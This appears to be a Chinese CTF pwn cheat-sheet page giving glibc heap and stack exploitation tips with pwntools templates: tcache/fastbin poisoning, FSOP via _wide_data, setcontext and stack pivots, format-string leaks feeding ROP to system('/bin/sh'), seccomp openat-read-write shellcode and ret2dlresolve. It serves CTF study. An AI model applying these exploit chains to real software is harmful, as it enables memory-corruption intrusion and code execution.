add(0x28, 0, b'aaaa')  # 0
add(0x28, 1, b'aaaa')  # 1
add(0x50, 2, b'aaaa')  # 2
add(0x60, 3, b'aaaa')  # 3

delete(0)
delete(1)

# 让 1 号 freed chunk 的 fd 指回 0 号 data 段
edit(1, b'\x20')

# 在 0 号 data 段里先伪造一个 fake chunk
edit(0, p64(0) * 3 + p64(0x31))

# 再 malloc 两次，把 fake chunk 拿回来
add(0x28, 0, b'aaaa')
add(0x28, 1, b'aaaa')

# 用 fake chunk的edit把原本chunk1的size 往 unsorted 范围抬
edit(1, p64(0) + p64(0x91))
delete(0)

只能申请小块，`tcache` 还满了甚至被关了，怎么把 `fastbin` 过渡到 unsorted leak？

这类题可以直接联想到 HITCON CTF 2024 Quals 的 Setjmp，以及 snakeCTF 2025 Quals 的 old school，核心不是死磕怎么伪造大 chunk，而是先把同 size 的 tcache bin 填满，再用一次大输入触发 malloc_consolidate()，让 fastbin 真的流进 unsorted，只要后面还有 UAF、打印副作用，或者 overlap，libc 就出来了

如果题目还做了 malloc_usable_size 这类校验，可以顺手记一个偏老但很好用的点：伪造 chunk header 时把 IS_MMAPPED 位置 1，很多检查路径会变得更宽松

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
p = process(elf.path)

def add(i, size, data=b'A'):
    ...

def delete(i):
    ...

# 先铺一批同 size 的小块
for i in range(12):
    add(i, 0x28, b'A' * 8)

# 前 7 个进 tcache，剩下的开始进 fastbin
for i in range(12):
    delete(i)

# 这里用一次大输入，迫使 glibc consolidate fastbin
big = b'0' * 0x500
p.sendlineafter(b'> ', big)

# 如果程序后面会打印/遍历这些 chunk，
# 就有机会把 unsorted 的 fd/bk(main_arena) 直接读出来
# leak = u64(recv(...)[:8])
# libc.address = leak - main_arena_off

# 如果要伪造一个更“好写”的 fake header，可以先记这个位：
fake_size = 0x91 | 2          # 2 == IS_MMAPPED
print(hex(fake_size))

只有 UAF / double free，safe-linking 还在，怎么把 `next` 指到目标地址？

先拿 heap leak，然后按 protected = ptr ^ (pos >> 12) 算保护指针。这里最容易答错的是 pos：它不是目标地址，也不是 chunk 基址，而是“存这个 next 指针的位置地址”。答这类题时，最好顺手把“先 leak heap，再 poison”这两个步骤一起说完整。

from pwn import *

context.binary = elf = ELF('./pwn')

def protect_ptr(pos, ptr):
    return ptr ^ (pos >> 12)

heap_chunk = 0x55555555a290
target = elf.got['free']

# next 指针一般落在 freed chunk 的 data 起始处
poisoned = protect_ptr(heap_chunk + 0x10, target)

# edit(victim_idx, p64(poisoned))
# 下一次 malloc(size) 就有机会返回 target

能 OOB 到 `tcache_perthread_struct`，怎么把它变成任意分配？

这里优先想的不是“还能不能再 leak 一点”，而是“能不能直接把下一次 malloc 发到目标地址”。counts[idx] 决定这个 bin 还能发几个 chunk，entries[idx] 决定下一次 malloc(size) 从哪取。只要把 entries 改成栈、.bss、全局函数指针表，或者别的关键结构旁边，下一次 malloc 就能把 chunk 直接发过去。

这类题的味道很像 SunshineCTF 2024 的 heap01，以及 corCTF 2024 的 corchatv3。

from pwn import *

context.binary = elf = ELF('./pwn')
p = process(elf.path)

heap_base = 0x55555555a000
tcache_struct = heap_base + 0x10
stack_leak = 0x7fffffffdc00

# 以 0x20 chunk 对应的 bin 为例
bin_idx = 0
count_addr = tcache_struct + bin_idx
entry_addr = tcache_struct + 0x80 + bin_idx * 8

# 想让下一次 malloc(0x18) 发到栈上某个位置
target = stack_leak - 0x18

# 真实题目里一般是先通过 OOB/UAF 改这两个地址
print('count_addr =', hex(count_addr))
print('entry_addr =', hex(entry_addr))
print('target     =', hex(target))

# write(count_addr, b'\x01')
# write(entry_addr, p64(target))
# malloc(0x18) -> returns target

已经能碰到 `smallbin` 了，怎么借 `tcache stashing unlink` 做一次定点写？

它的本质不是“再拿一个 bin”，而是“借 malloc 过程做一次定点写”。当某个 size 的 tcache 还没满，而 smallbin 里已经有同 size chunk 时，glibc 会在分配时顺手把 smallbin 里的 chunk 往 tcache 里搬。只要你提前把 bk 改到 target - 0x10 一类位置，就能把 unlink 的写操作借出来。

这类题真正要记的是这条路怎么串起来：smallbin、tcache 没满、malloc 时 stash、bk 改成目标附近。

from pwn import *

context.binary = elf = ELF('./pwn')

target = elf.got['puts']
fake_bk = target - 0x10

# 伪代码节奏：
# 1. 先让某个 size 的 tcache 空出来
# 2. 再让同 size chunk 进入 smallbin
# 3. UAF/overflow 改 victim->bk = fake_bk
# 4. malloc 同 size，触发 stashing / unlink 过程里的写

print('target  =', hex(target))
print('fake_bk =', hex(fake_bk))

# edit(victim, b'A' * off + p64(fake_bk))
# add(size, ...)

没有直接输出接口，但已经能碰到 `stdout` 附近，怎么一路转到 libc 和 stack？

先把分配点打到 stdout - 0x43 一类常见偏移，把 stdout 先变成泄漏口。如果你已经知道 libc，就进一步把 _IO_write_base/_ptr 之类字段指到 environ，这样第二跳就能从 libc 变成 stack leak，后面就可以直接改返回地址做栈 ROP。

这条链子现在已经不只是“老题模板”了，近几年的很多堆题都会把 stdout -> environ -> stack 当成标准中转站，因为 __free_hook 这类旧路子已经不稳定了。

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
p = process(elf.path)

stdout = libc.sym['_IO_2_1_stdout_']
environ = libc.sym['environ']
target = stdout - 0x43

# 第一步：先把 chunk 打到 stdout-0x43
# tcache/fastbin poisoning -> malloc() returns target

payload = b'a' * 0x33
payload += flat(
    0xfbad1800,        # _flags
    environ,           # _IO_read_ptr
    environ,           # _IO_read_end
    environ,           # _IO_read_base
    environ,           # _IO_write_base
    environ + 8,       # _IO_write_ptr
    environ + 8,       # _IO_write_end
    environ + 8,       # _IO_buf_base
    environ + 8,       # _IO_buf_end
)

# edit(idx, payload)
# stack = u64(p.recv(8).ljust(8, b'\x00'))

`glibc 2.34+` 没 hooks，也没有直接泄漏接口，最后一般往哪收尾？

更稳的路线通常不是硬说某个固定偏移，而是“先 stdout -> environ -> stack，再改 saved RIP 做栈 ROP”。如果程序退出路径更好打，也可以去想 exit handlers 或 _rtld_global。

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
p = process(elf.path)

# 已知：libc.address 和 stack_leak
saved_rip = stack_leak - 0x120   # 具体偏移按题调
rop = ROP([elf, libc])

rop.raw(rop.find_gadget(['ret'])[0])
rop.system(next(libc.search(b'/bin/sh\x00')))

# 如果你已经有任意写，就直接把 saved_rip 改成 rop.chain() 落点
# write(saved_rip, rop.chain())

只有一次函数指针劫持，不想赌 `one_gadget`，怎么把堆上的 ROP 拉起来？

很多新版 libc 题最后会走 setcontext。这里别死背 +61/+53，而是先 disas setcontext，确认它从哪个寄存器取 frame，再看 rsp 和最终落点 rip 从哪些偏移读。然后把 fake ucontext 和第二阶段 ROP 链铺到堆上，最后借一次函数指针、虚表、exit handler 或 FILE 路径跳进去。

如果 seccomp 在，就把第二阶段写成 openat -> read -> write；如果 seccomp 不在，就普通 system / execve 也行。

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
rop = ROP([elf, libc])

heap_frame = 0x404800
heap_rop = heap_frame + 0x200
flag = heap_frame + 0x400

rop.raw(rop.find_gadget(['ret'])[0])
rop.call(libc.sym['openat'], [-100, flag, 0, 0])
rop.call(libc.sym['read'], [3, flag, 0x100])
rop.call(libc.sym['write'], [1, flag, 0x100])

# 常见版本里会从 frame+0xa0 取 rsp，再从附近取新的 rip。
# 具体偏移一定以本地 disas setcontext 为准。
frame = flat({
    0xa0: heap_rop,
    0xa8: rop.find_gadget(['ret'])[0],
}, filler=b'\x00')

payload = frame.ljust(0x200, b'\x00') + rop.chain() + b'/flag\x00'
setcontext_pivot = libc.sym['setcontext'] + 61

# write(fake_chunk, payload)
# overwrite(call_target, p64(setcontext_pivot))
# 触发前确认调用点会把 fake_chunk 地址传进 setcontext 期待的寄存器

只有一次输入点，gadget 还不够全，怎么白嫖二段输入再做栈迁移？

先别急着硬凑 read(0, bss, size)。如果程序本身就有一段“准备参数然后 call fgets/read”的代码路径，更稳的做法是把返回地址改回那段逻辑，再把 saved rbp 改到你选好的伪栈附近。这样第二次输入会自动写到 rbp-0x20 一类位置，等函数尾部 leave; ret 一跑，栈就自己迁过去了。

如果第二阶段准备接 ret2dlresolve，伪栈别压在可写页底部。动态链接器解析符号时会额外 push/sub，离只读页太近很容易把 rsp 压崩。

from pwn import *

context.binary = elf = ELF('./pwn')
p = process(elf.path)

off = 0x28
fake_stack = elf.bss(0x800)
fgets_again = elf.sym['main'] + 0x87   # 改成题里“准备参数 + call fgets/read”的位置
leave_ret = 0x4011bd

payload1 = flat(
    b'A' * off,
    fake_stack + 0x20,   # saved rbp
    fgets_again,         # ret 到“准备参数 + 再次输入”那条路径
)
p.sendline(payload1)

stage2 = flat(
    fake_stack + 0x400,  # 下一个 rbp
    leave_ret,           # 等原函数尾部 leave; ret 时完成 pivot
    b'B' * 0x100,
)
p.sendline(stage2)

# 如果 stage2 准备接 ret2dlresolve：
# 1. 伪栈尽量放高一点
# 2. 给 ld.so 额外的 push/sub 留出空间

`Full RELRO + Canary + PIE + fmtstr + 栈溢出` 这种组合题，怎么串？

最常见的答案不是某个神奇 gadget，而是“前面 fmt 负责 leak，后面栈溢出负责收尾”。先用格式串把 canary、PIE、libc 一次拿全，再回到 main，第二次输入走正常 ROP。国内外赛题里这条链都非常高频。

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
p = process(elf.path)

fmt = b'%15$p.%17$p.%19$p'
p.sendline(fmt)
leaks = p.recvline().strip().split(b'.')

canary = int(leaks[0], 16)
pie_leak = int(leaks[1], 16)
libc_leak = int(leaks[2], 16)

elf.address = pie_leak - 0x1234
libc.address = libc_leak - 0x2724a

rop = ROP([elf, libc])
off = 0x88
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

payload = flat(
    b'A' * off,
    canary,
    b'B' * 8,
    ret,
    pop_rdi,
    next(libc.search(b'/bin/sh\x00')),
    libc.sym['system'],
)
p.sendline(payload)

`execve` 被 seccomp ban 了，`open` 也 ban 了，但 `openat` 还在，怎么收尾？

这时候别死盯 system("/bin/sh")。更稳的路线是 openat -> read -> write，或者有 sendfile 就走更短的链。很多题的关键点其实只是“open 不行时先看 openat”。如果栈太小，就先 pivot 到 .bss / heap 再做第二阶段。

from pwn import *

context.arch = 'amd64'
context.os = 'linux'

asm_code = shellcraft.openat(-100, '/flag', 0, 0)
asm_code += shellcraft.read('rax', 'rsp', 0x100)
asm_code += shellcraft.write(1, 'rsp', 0x100)

shellcode = asm(asm_code)
print(disasm(shellcode))

没有 libc leak，但手里有一次可控 `read` 和基本 ROP，怎么借 `ret2dlresolve` 补符号？

优先想 ret2dlresolve。这类题的关键不是“背模板”，而是知道什么时候该借动态解析器补出 system/execve。核心是：把伪造结构丢进 .bss，再借动态链接器帮你解析符号。

from pwn import *

context.binary = elf = ELF('./pwn')
p = process(elf.path)
rop = ROP(elf)

off = 0x88
bss = elf.bss(0x800)
dl = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.read(0, bss, len(dl.payload))
rop.ret2dlresolve(dl, bss)

payload = flat(
    b'A' * off,
    rop.chain(),
)
p.sendline(payload)
p.send(dl.payload)

程序里出现 `setjmp/longjmp/jmp_buf`，该往哪个方向想？

这个点别只当成普通流程控制看，它本质上也可能是另一个控制流对象。近两年的题里，jmp_buf/setjmp/longjmp 很常被拿来替代“传统返回地址覆写”。jmp_buf 里通常会存寄存器现场，rsp/rip 往往经过 pointer mangling，能改它就等于在等一次 longjmp。

在 x86_64 glibc 上，常见的 pointer mangling 关系可以先记成：

from pwn import *

def rol(x, n):
    return ((x << n) | (x >> (64 - n))) & ((1 << 64) - 1)

def ror(x, n):
    return ((x >> n) | (x << (64 - n))) & ((1 << 64) - 1)

def ptr_mangle(ptr, guard):
    return rol(ptr ^ guard, 0x11)

def ptr_demangle(val, guard):
    return ror(val, 0x11) ^ guard

如果题目真的让你打 jmp_buf，常见骨架是：

from pwn import *

context.binary = elf = ELF('./pwn')

guard = 0xdeadbeefcafebabe   # 先 leak pointer_guard
fake_rsp = 0x404800
target_rip = elf.sym['win']

# 假设 env 的 rsp/rip 槽位已知，真实题目里按版本和结构调
jmp_buf = flat(
    0, 0, 0, 0,
    ptr_mangle(fake_rsp, guard),
    ptr_mangle(target_rip, guard),
)

# write(saved_env, jmp_buf)
# 后面触发 longjmp(saved_env, 1)

程序会 `fork`，子进程里泄漏到的地址，对父进程还能不能直接用？

如果是 fork() 而不是 execve()，那答案通常是“有用”。因为子进程刚 fork 出来时地址空间是父进程的镜像，libc、stack、canary、PIE 往往都一致。现在不少题会故意把 leak 和真正利用拆在父子进程里，让你别白白丢掉子进程拿到的地址。

from pwn import *

# 伪代码思路：
# 1. 先让子进程帮你 leak canary / libc / stack
# 2. 读回这些 leak
# 3. 再把同样地址直接用在父进程 exploit 上

io = process('./pwn')

# child phase: 拿 leak
io.sendline(b'LEAK')
canary = u64(io.recvn(8))
libc_leak = u64(io.recvn(8))
stack_leak = u64(io.recvn(8))

# parent phase: 直接复用这些地址
payload = flat(
    b'A' * 0x88,
    canary,
    b'B' * 8,
    stack_leak,
)
io.sendline(payload)

能打到 `IO_FILE` 时，怎么把 `FSOP` 当成 leak 或控制流原语来用？

先把 IO_FILE 拆成三类看：

只是要 leak：优先 stdout/stderr，本质是改 _flags 和读写指针，让 libc 自己把地址吐出来
要稳定控制流：优先走“合法主 vtable + 被篡改的宽字符侧链”
要拼版本相关 house：再去看 House of Apple / House of Pig / _IO_str_jumps / _IO_obstack_jumps / __printf_buffer_as_file_jumps

单纯 leak 时，最常见还是上面那条 stdout -> environ -> stack。真正值得单独记住的是现代 glibc 下的宽字符链，因为主 vtable 现在校验很严，很多题会绕去打 _wide_data。

现代 glibc 里，一条很常见的控制流路径是：

exit()
 -> __run_exit_handlers
  -> _IO_cleanup
   -> _IO_flush_all
    -> if (fp->_mode > 0 &&
           fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
         _IO_OVERFLOW(fp, EOF)
          -> _IO_wfile_overflow
           -> if (wide_write_base == NULL)
                _IO_wdoallocbuf
                 -> _IO_WDOALLOCATE(fp)
                  -> fp->_wide_data->_wide_vtable->__doallocate(fp)

这条链最关键的点有五个：

上面这张图写的是“宽字符侧链”那一支；实战里另一类常见入口是普通脏写分支：_mode <= 0 && _IO_write_ptr > _IO_write_base，Apple2/Apple3 经常更像这条
触发最好选 exit() 或正常 main return，_exit()、abort()、致命信号不一定走这条
主 vtable 不能乱伪造，通常要放 glibc 里合法的 &_IO_wfile_jumps
要让 _IO_flush_all 愿意继续往下跑，常见条件是 fp->_mode > 0 且 write_ptr > write_base
真正被你劫持的不是主 vtable，而是 fp->_wide_data->_wide_vtable
如果你是想把 _IO_wfile_overflow -> _IO_WDOALLOCATE 这条链走通，除了 write_ptr > write_base，通常还要保证对应的 buf_base == NULL

x86_64 glibc 2.39 下常见偏移可以先记成：

FILE + 0xa0：_wide_data
FILE + 0xc0：_mode
FILE + 0xd8：主 vtable
wide_data + 0x18：_IO_write_base
wide_data + 0x20：_IO_write_ptr
wide_data + 0xe0：_wide_vtable
wide_vtable + 0x68：__doallocate

一个更贴近现代 glibc 的最小骨架可以先记成这样：

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')

fake_file = 0x404900
fake_wide = 0x404b00
fake_wide_vtable = 0x404c00
fake_lock = 0x404d00
target = elf.sym.get('win', 0x4011d6)

# 不同 glibc 版本检查点会有差异，下面这组偏移以 x86_64 新版 glibc 常见布局为准
file_struct = fit({
    0x88: p64(fake_lock),                 # _lock 尽量给可写地址
    0xa0: p64(fake_wide),                 # _wide_data
    0xc0: p32(1),                         # _mode > 0
    0xd8: p64(libc.sym['_IO_wfile_jumps'])# 合法主 vtable
}, filler=b'\x00')

wide_data = fit({
    0x18: p64(0),                         # _IO_write_base = NULL
    0x20: p64(1),                         # _IO_write_ptr > _IO_write_base
    0xe0: p64(fake_wide_vtable),          # _wide_vtable
}, filler=b'\x00')

wide_vtable = fit({
    0x68: p64(target),                    # __doallocate
}, filler=b'\x00')

# write(fake_file, file_struct)
# write(fake_wide, wide_data)
# write(fake_wide_vtable, wide_vtable)
# 再把 stderr/stdout 指针改到 fake_file，或者直接覆盖现成 FILE 对象内容
# 最后触发 exit() / 正常 return

几个很容易踩坑的点，最好单独记：

主 vtable 现在会过 IO_validate_vtable，所以“fake FILE + fake main vtable”在新 glibc 往往直接死
宽字符链这条路的核心是“主表合法，侧链非法”，别把两条链混了
__doallocate(fp) 的入参是 fp，所以落点不一定非得是 system；很多时候 win、setcontext、或者你当前寄存器状态更适合的 call sink 更稳
想走这条链，_lock、_mode、_wide_data、写指针关系通常都要自洽，不然还没到劫持点就先崩了
偏移非常吃 glibc 版本；真打时优先本地 pahole / readelf / 源码确认，不要死背固定数字

真正做题时，先别急着背 house 名字，先按下面这个顺序判断：

你能不能直接改现成的 stdout/stderr 内容？
- 能：先做 leak，优先把 stdout/stderr 变成吐 libc / stack 地址的口子
你能不能把某个全局 FILE 指针或 _IO_list_all 改到堆上的 fake FILE？
- 能：优先想 exit() 触发，后面再看你该走 wfile、str、obstack 还是 printf_buffer
本地 libc 里有没有 _IO_obstack_jumps？
- 有：说明老一点的 obstack 路线还可能活着
- 没有，但有 __printf_buffer_as_file_jumps：说明更像 glibc 2.37+ 的新桥路线
你的 fake FILE 更容易伪造成“写流”还是“读流”？
- 写流：优先 Apple2、Pig、obstack、printf_buffer
- 读流：优先 Apple3 这类借 _codecvt/__gconv_step 做寄存器布局的路线

本地先确认版本和入口，常用命令可以直接记：

readelf -Ws ./libc.so.6 | rg '_IO_wfile_jumps|_IO_obstack_jumps|__printf_buffer_as_file_jumps|_IO_str_jumps'
strings ./libc.so.6 | rg 'GLIBC_2\\.(3[4-9]|4[0-9])'
gdb -q ./pwn
pwndbg> p &_IO_2_1_stdout_
pwndbg> p &_IO_2_1_stderr_
pwndbg> p &_IO_wfile_jumps
pwndbg> p &__printf_buffer_as_file_jumps

把这块再按套路名压成速查，可以先记这张图：

stdout/stderr：优先做 leak，后面常接 environ -> stack
_IO_wfile_jumps + _wide_vtable：现代 glibc 下最值得优先想到的稳定控制流入口
House of Apple2：主表放合法 _IO_wfile_jumps，再把 fp/_wide_data/_wide_vtable 叠到一块，最后借 __doallocate(fp) 起跳；很多题会配合 largebin attack -> _IO_list_all
House of Apple3：本质是 &_IO_wfile_jumps + 0x08 这种错位虚表，再借 _codecvt -> __gconv_step -> __fct 布出 setcontext 一类寄存器布局；很适合堆上直接接大 ROP
House of Pig：核心不是“背名字”，而是记住 _IO_str_overflow 会根据你伪造的 write_ptr/buf_base/buf_end 去算一次精确的 malloc(new_size)；老题常接 hook，现代题也可以把这次分配导向别的目标
_IO_obstack_jumps / House of Lys：老版本 glibc 还能走 obstack_grow -> _obstack_newchunk -> CALL_CHUNKFUN 这条非常硬的 call 链
__printf_buffer_as_file_jumps：glibc 2.37+ 更该优先看的新路线；外层是合法 FILE，第二层是 __printf_buffer，第三层再落回 obstack，最后还是去摸 CALL_CHUNKFUN

把这些路线翻成“题面语言”，大概可以这样想：

只能改 stdout/stderr 本体：先 leak，别急着硬控流
能把 _IO_list_all 指到堆块：先看 exit()，再看 fake FILE 的字段更像写流还是读流
libc 里还有 _IO_obstack_jumps：要对 obstack 提高警惕
libc 没有 _IO_obstack_jumps，但有 __printf_buffer_as_file_jumps：多半要从 printf_buffer 那层绕回 obstack
看到 _codecvt、__gconv_step、setcontext 这些词：优先想到 Apple3

通用shellcode

更多shellcode（补充）

x86 / i386

amd64 / x64

ARM

AArch64 / ARM64

MIPS

RISC-V / riscv64

shellcode小技巧（补充）

通用思路速记

用 read 返回值直接起 SROP

寄存器几乎全为 0 时，先白嫖一次 syscall

有限字符 / 自写 stager

第一段太短时，先读第二段再跳

侧信道爆破内存 / flag

ORW / 文件读取shellcode

amd64 / x64

x86 / i386

其他架构 pwn 速记

网络shell / stager

受限字符与沙箱备忘

ret2shellcode

ret2syscall

格式化字符串

ROPgadget / one_gadget / gadget 查找命令

GDB / pwndbg 常用调试命令

VM Pwn

比赛中积累的tricks

堆上没有直接泄漏接口，而且申请size还卡得很小，怎么先把题做成可 leak？(需要UAF)

只能申请小块，tcache 还满了甚至被关了，怎么把 fastbin 过渡到 unsorted leak？

只有 UAF / double free，safe-linking 还在，怎么把 next 指到目标地址？

能 OOB 到 tcache_perthread_struct，怎么把它变成任意分配？

已经能碰到 smallbin 了，怎么借 tcache stashing unlink 做一次定点写？

没有直接输出接口，但已经能碰到 stdout 附近，怎么一路转到 libc 和 stack？

glibc 2.34+ 没 hooks，也没有直接泄漏接口，最后一般往哪收尾？

只有一次函数指针劫持，不想赌 one_gadget，怎么把堆上的 ROP 拉起来？

只有一次输入点，gadget 还不够全，怎么白嫖二段输入再做栈迁移？

Full RELRO + Canary + PIE + fmtstr + 栈溢出 这种组合题，怎么串？

execve 被 seccomp ban 了，open 也 ban 了，但 openat 还在，怎么收尾？

没有 libc leak，但手里有一次可控 read 和基本 ROP，怎么借 ret2dlresolve 补符号？

程序里出现 setjmp/longjmp/jmp_buf，该往哪个方向想？

程序会 fork，子进程里泄漏到的地址，对父进程还能不能直接用？

能打到 IO_FILE 时，怎么把 FSOP 当成 leak 或控制流原语来用？

发送评论 编辑评论

推荐文章

用 `read` 返回值直接起 `SROP`

寄存器几乎全为 `0` 时，先白嫖一次 `syscall`

有限字符 / 自写 `stager`

只能申请小块，`tcache` 还满了甚至被关了，怎么把 `fastbin` 过渡到 unsorted leak？

只有 UAF / double free，safe-linking 还在，怎么把 `next` 指到目标地址？

能 OOB 到 `tcache_perthread_struct`，怎么把它变成任意分配？

已经能碰到 `smallbin` 了，怎么借 `tcache stashing unlink` 做一次定点写？

没有直接输出接口，但已经能碰到 `stdout` 附近，怎么一路转到 libc 和 stack？

`glibc 2.34+` 没 hooks，也没有直接泄漏接口，最后一般往哪收尾？

只有一次函数指针劫持，不想赌 `one_gadget`，怎么把堆上的 ROP 拉起来？

`Full RELRO + Canary + PIE + fmtstr + 栈溢出` 这种组合题，怎么串？

`execve` 被 seccomp ban 了，`open` 也 ban 了，但 `openat` 还在，怎么收尾？

没有 libc leak，但手里有一次可控 `read` 和基本 ROP，怎么借 `ret2dlresolve` 补符号？

程序里出现 `setjmp/longjmp/jmp_buf`，该往哪个方向想？

程序会 `fork`，子进程里泄漏到的地址，对父进程还能不能直接用？

能打到 `IO_FILE` 时，怎么把 `FSOP` 当成 leak 或控制流原语来用？

发送评论编辑评论